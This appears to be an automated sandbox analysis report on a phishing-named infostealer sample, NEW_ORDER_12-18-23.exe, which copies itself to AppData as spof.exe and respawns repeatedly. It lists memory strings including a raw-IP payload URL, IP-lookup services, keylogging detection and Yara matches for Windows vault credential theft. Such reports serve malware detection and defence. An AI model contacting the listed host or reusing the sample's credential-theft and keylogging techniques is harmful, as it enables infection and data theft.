                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163/Akoob.pdf
                      Source: spof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163/Akoob.pdf(Q
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163/Akoob.pdf(Qu
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00001000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249C21000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A791000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BB82000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C701000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0AADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C64D000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1901609525.0000022249D49000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: spof.exe, 00000019.00000002.1965677845.0000012B0A8E6000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmp, NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BA4F000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 0000000B.00000002.1903558795.000002225BAC8000.00000004.00000800.00020000.00000000.sdmp, spof.exe, 00000019.00000002.1968348865.0000012B1C658000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, xNJ.cs.Net Code: yFqFQk

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 25.2.spof.exe.12b1c7123e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.spof.exe.12b1c7123e8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.spof.exe.2225bb97db0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.spof.exe.2225bb97db0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 11.2.spof.exe.22249e4e2b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B8708300_2_00007FFD9B870830
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B871BB90_2_00007FFD9B871BB9
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B8710780_2_00007FFD9B871078
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B8718BD0_2_00007FFD9B8718BD
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B871BE40_2_00007FFD9B871BE4
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeCode function: 0_2_00007FFD9B87190C0_2_00007FFD9B87190C
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 11_2_00007FFD9BAB105811_2_00007FFD9BAB1058
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 11_2_00007FFD9BAB083011_2_00007FFD9BAB0830
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 11_2_00007FFD9BAB18BD11_2_00007FFD9BAB18BD
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 11_2_00007FFD9BB9294411_2_00007FFD9BB92944
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 25_2_00007FFD9BAA105825_2_00007FFD9BAA1058
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 25_2_00007FFD9BAA083025_2_00007FFD9BAA0830
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 25_2_00007FFD9BAA18B025_2_00007FFD9BAA18B0
                      Source: C:\Users\user\AppData\Roaming\spof.exeCode function: 25_2_00007FFD9BB8294425_2_00007FFD9BB82944
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753130875.0000024A7BA90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAhtdg.dll" vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11F66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename62b3f2ca-2b8c-4dc5-b1d7-ef711ea74cbf.exe4 vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1753819644.0000024A7C890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000000.1701000250.0000024A79F02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejojo.exe" vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A0034F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename62b3f2ca-2b8c-4dc5-b1d7-ef711ea74cbf.exe4 vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11DF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1749827601.0000024A00158000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A11EAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exe, 00000000.00000002.1750794274.0000024A100F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAhtdg.dll" vs NEW_ORDER_12-18-23.exe
                      Source: NEW_ORDER_12-18-23.exeBinary or memory string: OriginalFilenamejojo.exe" vs NEW_ORDER_12-18-23.exe
                      Source: 25.2.spof.exe.12b1c7123e8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.spof.exe.12b1c7123e8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.spof.exe.2225bb97db0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.spof.exe.2225bb97db0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.spof.exe.22249e11790.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 11.2.spof.exe.22249e4e2b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a100f1b20.2.raw.unpack, IndexerModelWatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a100f1b20.2.raw.unpack, IndexerModelWatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a100f1b20.2.raw.unpack, IndexerModelWatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, 9b2qdB.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, 9b2qdB.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, XgEuq.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, XgEuq.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, XgEuq.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.NEW_ORDER_12-18-23.exe.24a11f7b1d0.6.raw.unpack, XgEuq.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/4@0/1
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeFile created: C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: NEW_ORDER_12-18-23.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: NEW_ORDER_12-18-23.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: NEW_ORDER_12-18-23.exeVirustotal: Detection: 34%
                      Source: NEW_ORDER_12-18-23.exeReversingLabs: Detection: 27%
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeFile read: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\spof.exe "C:\Users\user\AppData\Roaming\spof.exe"
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\spof.exe "C:\Users\user\AppData\Roaming\spof.exe"
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exe
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeProcess created: C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe C:\Users\user\Desktop\NEW_ORDER_12-18-23.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\spof.exeProcess created: C:\Users\user\AppData\Roaming\spof.exe C:\Users\user\AppData\Roaming\spof.exeJump to behavior
